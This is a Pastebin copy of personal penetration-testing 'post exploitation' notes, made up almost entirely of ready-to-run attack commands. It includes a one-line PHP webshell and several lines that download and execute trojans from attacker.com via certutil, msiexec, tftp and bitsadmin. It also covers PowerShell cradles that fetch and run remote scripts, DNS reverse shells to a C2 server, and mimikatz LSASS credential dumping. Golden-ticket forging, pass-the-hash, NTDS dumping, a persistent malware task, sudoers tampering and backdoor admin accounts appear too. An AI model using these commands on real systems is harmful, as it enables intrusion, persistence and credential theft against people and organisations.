ToKeiChun

POST exploitation (https://github.com/w4fz5uck5)

Sep 22nd, 2020
317
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.42 KB | None | 0 0
  1. #https://raw.githubusercontent.com/w4fz5uck5/Pentest-notes/master/POST_exploitation.txt
  2. CYTHON:
  3. sudo pip install cython
  4. mv test.py test.pyx
  5. cython test.pyx --embed
  6.  
  7. <python 3>
  8. gcc -Os -I /usr/include/python3.5m -o test test.c -lpython3.5m -lpthread -lm -lutil -ldl
  9.  
  10. <python 2>
  11. gcc -Os -I /usr/include/python2.7 -o test test.c -lpython2.7 -lpthread -lm -lutil -ldl
  12.  
  13. LIKE A BOSS PHP WEBSHELL:
  14. <?=($_=@$_GET[0]).@$_($_GET[1]);
  15. |
  16. -> 127.0.0.1?0=system&1=ls -la
  17.  
  18. DOWNLOAD/EXECUTE FILES WITHOUT POWERSHELL:
  19. # attacker machine: python -m SimpleHTTPServer 80
  20. certutil -urlcache -split -f attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
  21.  
  22. # attacker machine: msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.104 lport=31337 -f msi > trojan.msi
  23. # attacker machine: python -m SimpleHTTPServer 80
  24. msiexec /q /i http://attacker.com/trojan.msi
  25.  
  26. # attacker machine: atftpd --daemon --port 69 /tmp
  27. tftp -i attacker.com GET trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
  28.  
  29. # attacker machine: python -m SimpleHTTPServer 80
  30. bitsadmin /transfer n http://attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
  31.  
  32. # attacker machine: twistd -n ftp -p 21
  33. ftp 127.0.0.1 username password get file exit
  34.  
  35. ANTIVIRUS:
  36. sc query Windefend #Check for windows defender
  37.  
  38. SHOW HOTFIXES:
  39. wmic qfe get Caption,Description,HotFixID,Installedon
  40.  
  41. DNS reverse shell
  42. |-----------------Dnscat2 powershell METHOD-------------
  43. '-> https://github.com/iagox86/dnscat2
  44. |-> ruby dnscat2 dummyc2.net -e open --no-cache # Start dnscat2 server on your c2dummy machine
  45. | |
  46. | '-> https://github.com/lukebaggett/dnscat2-powershell # Connect to the server using powershell script
  47. | '-> Start-Dnscat2 -Domain dummyc2.net -DNSServer <c2IP> -NoEncryption
  48. |
  49. |--------------------powercat METHOD--------------------
  50. '-> https://github.com/iagox86/dnscat2/archive/v0.01.zip
  51. '-> dnscat2 version 1 (works better):
  52. |
  53. -> ruby dnscat2 dummyc2.net # Start dnscat2 server on your c2dummy machine
  54. | |
  55. | '-> https://github.com/besimorhino/powercat
  56. | '-> powercat -c <c2ip> -dns dummyc2.net -p 53 -rep -v -ep -dnsft 20 # Connecting to server using powercat script
  57. |
  58. |--------------------iagox86 METHOD--------------------
  59. '-> https://downloads.skullsecurity.org/dnscat2/
  60. '-> https://github.com/iagox86/dnscat2
  61. |
  62. '-> PS C:\Users\bob\Desktop>
  63. '-> $PEBytes = [Convert]::FromBase64String((new-object net.webclient).DownloadString("http://c2.net:8000/dnscat.txt"));
  64. |
  65. '-> IEX(new-object net.webclient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1");
  66. |
  67. '-> Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "--dns domain=c2.net,server=8.8.8.8"
  68.  
  69. PASS-THE-HASH:
  70. Metasploit:
  71. use exploit/windows/smb/psexec
  72. pth-smbclient --user=<USER> --pw-nt-hash -m smb3 -L <TARGET_IP> \\\\<TARGET_IP>\\ <SMB HASH>
  73. pth-winexe -U <DOMAIN>/<USER>%<PASSWORD> --system //<TARGET_IP> cmd.exe
  74. pth-winexe -U <DOMAIN>/<USER>%00000000000000000000000000000000:<PASSWORD> --system //<TARGET_IP> cmd.exe # NT is not necessary, only LM
  75. |
  76. -> https://github.com/byt3bl33d3r/pth-toolkit.git
  77. DOCKER:
  78. docker run -v /:/host -t -i bash #privilege escalation: https://fosterelli.co/privilege-escalation-via-docker.html
  79.  
  80. Nice and reliable payloads:
  81. windows/meterpreter_reverse_https
  82.  
  83. CREDENTIALS:
  84.  
  85. .--
  86. | From non-auth user to local admin in 3 steps (still to common) Nullsession:
  87. | net use \\dc\ipc$ "" /u:""
  88. |
  89. | Search for cpasswords in gpo's:
  90. | dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt
  91. |
  92. | Decrypt the cPassword:
  93. | gpp-decrypt <string>
  94. \_
  95.  
  96. PWDUMP:
  97. reg save hklm\sam c:\sam
  98. reg save hklm\system c:\system
  99. pwdump system sam
  100.  
  101. Mimikatz:
  102. LSASS.DUMP:
  103. C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
  104. mimikatz # sekurlsa::minidump lsass.dmp
  105. mimikatz # sekurlsa::logonPasswords
  106. <....>
  107. GOLDEN TICKET:
  108. http://rycon.hu/papers/goldenticket.html
  109. https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/
  110. https://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/#gref
  111.  
  112. cmds:
  113. kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
  114.  
  115. sekurlsa::tickets /export
  116. kerberos::ptt <out-*krbtgt*.kirbi> # Located on mimikatz current work folder
  117.  
  118. BYPASSING AV:
  119. https://github.com/klsecservices/bat-armor/blob/master/examples/krbtgt.bat
  120.  
  121. MIMIKATZ PARSER: #https://gist.github.com/Raikia/66ba8279971d16770e94
  122. Mimikatz 1.0:
  123. cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
  124.  
  125. Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
  126.  
  127. cat mimikatz_dump.txt | pcregrep -M 'Username\s+:\s+[^\s]+\n.*Domain\s+:\s+[^\s]+\n.*Password\s+:\s+[^\s]+\n' | sed "s/'/\\\'/" | xargs -L 3 echo | grep -v '\(null\)' | sed -e 's/* Username : //g;s/* Domain ://g;s/* Password ://g' | awk '{print $2 "\\" $1 ":" $3}' | sort -u
  128.  
  129.  
  130. Domain Controller:
  131. nltest /dclist:domain.corp #resolve domain DCs names
  132. crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -p <password> #dump all ntds credentials using clean text password
  133. crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -H <NTLM> #dump all ntds credentials using hash
  134. crackmapexec -t 20 smb <IPS.TXT>(or ip/24) -d <domain> -u <username> -H <NTLM> #bruteforce hosts using leaked administrators credentials
  135. qwinsta # show logged users
  136. quser
  137. net groups /domain
  138. net groups "Domain Admins" /domain
  139. Exchange Trusted Subsystem // Exchange Windows Permissions:
  140. https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
  141.  
  142. VNCINJECT:
  143. use exploit/windows/local/payload_inject
  144. |
  145. -> set payload windows/vncinject/reverse_tcp
  146.  
  147. TCPDump:
  148. The machine can communicate with you?
  149. |
  150. -> tcpdump -i <interface> src host <target_ip>
  151. You can communicate with the target machine?
  152. |
  153. -> tcpdump -i <interface> dst host <target_ip>
  154. |
  155. -> Try to ping to know if that target machine have some connection with your pc.
  156.  
  157. Windows:
  158.  
  159. WMIC:
  160. wmic logicaldisk get caption,description,drivetype,providername,volumename # show windows logical disks
  161. wmic diskdrive list brief /format:list # show windows disks drivers
  162.  
  163. Windows Nmap like:
  164. setspn –Q */*
  165.  
  166. certutil.exe:
  167. certutil -urlcache -split -f <WEBSITE>/backdoor.vbs C:\Windows\System32\backdoor.vbs && cscript .\backdoor.vbs
  168. cmd.exe /C certutil.exe -urlcache -split -f "https://pastebin.com/raw/2agkDJKs" %TEMP%\p.txt && certutil.exe -f -decode %TEMP%\p.txt %TEMP%\p.exe #download procdump.exe
  169.  
  170. bitsadmin:
  171. bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip
  172.  
  173. POWERSHELL:
  174. Execute commands of another user:
  175. shellpop --number 9 --reverse --host <IP> --port <PORT>
  176.  
  177. put the output in a file called "attack.txt", then:
  178. $user = "dummy"
  179. $password = "dummy" | ConvertTo-SecureString -AsPlainText -Force
  180. $creds = new-object system.management.automation.pscredential($user,$password)
  181. Start-Process -FilePath powershell.exe -WorkingDirectory "C:\Windows\System32\WindowsPowershell\v1.0\" -Credential $creds -ArgumentList("-nop -ep bypass IEX(new-object System.Net.WebClient).DownloadString('http://10.0.2.15:5252/attack.txt')")
  182.  
  183. Powershell -nop -ep bypass -c "$file = Get-Content %TEMP%\b64.txt; Select-Object -Last 666 $file; $file"
  184. powershell -nop -ep bypass -c "IEX(new-object system.net.WebClient).DownloadString('https://pastebin.com/raw/yUjG8y4Q'); Invoke-MS16-032"
  185. powershell -nop -ep bypass -File .\scan.ps1 -StartIPv4Address 192.168.1.0 -EndIPv4Address 192.168.1.0/24 -Force
  186.  
  187. CACLS Windows permissions:
  188. Common:
  189. icacls <PATH> /grant "<USER>":(OI)(CI)M
  190.  
  191. Add Read-Only permission to a single file
  192. CACLS myfile.txt /E /G "Power Users":R
  193.  
  194. Add Full Control permission to a second group of users
  195. CACLS myfile.txt /E /G "FinanceUsers":F
  196.  
  197. Now revoke the Read permissions from the first group
  198. CACLS myfile.txt /E /R "Power Users"
  199.  
  200. Now give the first group Full-control:
  201. CACLS myfile.txt /E /G "Power Users":F
  202.  
  203. Give the Finance group Full Control of a folder and all sub folders
  204. CACLS c:\docs\work /E /T /C /G "FinanceUsers":F
  205.  
  206. SCHTASKS:
  207. schtasks /query /fo LIST /v #query all tasks
  208. schtasks /query /tn malware_task /V #query single task
  209. schtasks /create /sc minute /mo 1 /tn "malware_task" /tr "C:\Users\w4fz5uck5\Desktop\work\malware.exe" #each 1 min, the malware is executed
  210.  
  211. DPKG LIST:
  212. dpkg-query -l
  213.  
  214. Ports checkup:
  215. netstat -plunt
  216. sockstat -l #freebsd
  217.  
  218. Ping port scanner:
  219. for i in $(seq 1 65535); do timeout 0.1 /bin/bash -c "echo &>/dev/tcp/<IP>/$i && echo '$i is open'" 2>/dev/null; done
  220.  
  221. Mysql commands:
  222. mysql -u root --password=toor -e "use users; show tables;"
  223. mysql -u root --password=toor -e "\!/bin/bash"
  224.  
  225. Privesc Linux:
  226. sudo -l
  227. find / -perm -2 ! -type l -ls 2>/dev/null
  228. find / -writable -user <USER> 2>/dev/null
  229. find / -perm -4000 2>/dev/null
  230. find / -name <FILE_NAME>
  231. cat /etc/crontab
  232. ls -lRa /var/www/html/
  233. procmon.sh
  234. rpm -aq
  235. dirtycow.c
  236. echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/updat
  237.  
  238. Privesc Windows:
  239. https://pentestlab.blog/tag/local-exploits/
  240. rottenpotato.exe
  241. ms16-032
  242. taihou32.exe #CVE-2015-1701
  243. taihou64.exe
  244. Tater
  245. post/multi/recon/local_exploit_suggester
  246. net users w4fz5uck5 h4x00r /add && net localgroup administrators w4fz5uck5 /add
  247.  
  248. Web directories:
  249. /var/www/html #linux
  250. C:\inetpub\wwwroot #windows
  251.  
  252. Portfwd:
  253. proxytunnel -p 10.0.1.114:3128 -d 127.0.0.1:22 -a 4444 #Used to portfwd in squid proxies.
  254. socat TCP-LISTEN:<PORT>,reuseaddr,addr TCP:<REMOTE_IP>:<REMOTE_PORT>
  255. /etc/rinet.conf #Create a proxy for tunneling
  256.  
  257. ssh:
  258. Own all ports:
  259. shuttle -r <REMOTE_IP> 0/0
  260. local_tunnel:
  261. ssh <USER>@127.0.0.1 -L 5500:localhost:5500 # Send my local port to the host who connected in my pc.
  262. remote_tunnel:
  263. ssh <USER>@127.0.0.1 -R 127.0.0.1:5500:localhost:5500 # Send my local port to the host who i'm connecting.
  264. nmap_trough_ssh:
  265. ssh -D 1080 user@host
  266. nmap -sS 1.2.3.4 --proxy 127.0.0.1:1080
  267. PLINK (need ansicon to run without ANSI bugs):
  268. ansicon.exe plink.exe -ssh test@192.168.0.108 #https://github.com/adoxa/ansicon/releases/download/v1.84/ansi184-bin.zip
  269.  
  270. Metapsloit-Meterpreter:
  271. portfwd add –l 3389 –p 3389 –r <TARGET_HOST>
  272.  
  273. Oracle DB:
  274.  
  275. metasploit-framework:
  276. auxiliary/admin/oracle/sid_brute
  277. auxiliary/admin/oracle/tnscmd
  278. auxiliary/admin/oracle/oracle_login
  279. auxiliary/scanner/oracle/sid_brute
  280. auxiliary/scanner/oracle/sid_enum
  281. auxiliary/scanner/oracle/tnslsnr_version
  282.  
  283. odat:
  284. Usefull commands:
  285. get,put,remove:
  286. python odat.py utlfile 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --help
  287.  
  288. put:
  289. python odat.py dbmsxslprocessor -s <ip> -U SCOTT -P tiger -d XE --sysdba --putFile 'C:\inetpub\wwwroot\' 'test.txt' 'test.txt'
  290.  
  291. read:
  292. python odat.py ctxsys -s <ip> -U SCOTT -P tiger -d XE --sysdba --getFile 'C:\inetpub\wwwroot\test.txt'
  293.  
  294. /*Features
  295. Thanks to ODAT, you can:
  296. search valid SID on a remote Oracle Database listener via:
  297. a dictionary attack
  298. a brute force attack
  299. ALIAS of the listener
  300. search Oracle accounts using:
  301. a dictionary attack
  302. each Oracle user like the password (need an account before to use this attack)
  303. execute system commands on the database server using:
  304. dbmsscheduler
  305. java
  306. externaltables
  307. oradbg
  308. download files stored on the database server using:
  309. utlfile
  310. external tables
  311. CTXSYS
  312. upload files on the database server using:
  313. utlfile
  314. dbmsxslprocessor
  315. dbmsadvisor
  316. delete files using:
  317. utlfile
  318. send/reveive HTTP requests from the database server using:
  319. utlhttp
  320. HttpUriType
  321. scan ports of the local server or a remote server using:
  322. utlhttp
  323. HttpUriType
  324. utltcp
  325. exploit the CVE-2012-313 (http://cvedetails.com/cve/2012-3137)
  326. pickup the session key and salt for arbitrary users
  327. attack by dictionary on sessions*/
  328. #https://www.kitploit.com/2014/07/odat-oracle-database-attacking-tool.html
  329.  
  330.  
  331. # SPEEDING UP proxying
  332. # https://www.hackwhackandsmack.com/?p=1021
  333.  
  334. proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap_old --append-output <IP Address>
  335.  
  336. Bringing Xargs into the loop with a thread count of 50 dramatically improves the results and only took 9 seconds to complete. An example of this usage has been shown below:
  337.  
  338. seq 1 1000 | xargs -P 50 -I{} proxychains nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output <IP Address>
  339.  
  340. If you want to run multiple ports or port ranges against multiple hosts you could use the following alternative:
  341.  
  342. seq 1 254 | xargs -P 50 -I{} proxychains nmap -p 80,443,3389,445,22 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output 192.168.1.{}
  343. #TODO
  344.  
Add Comment
Please, Sign In to add comment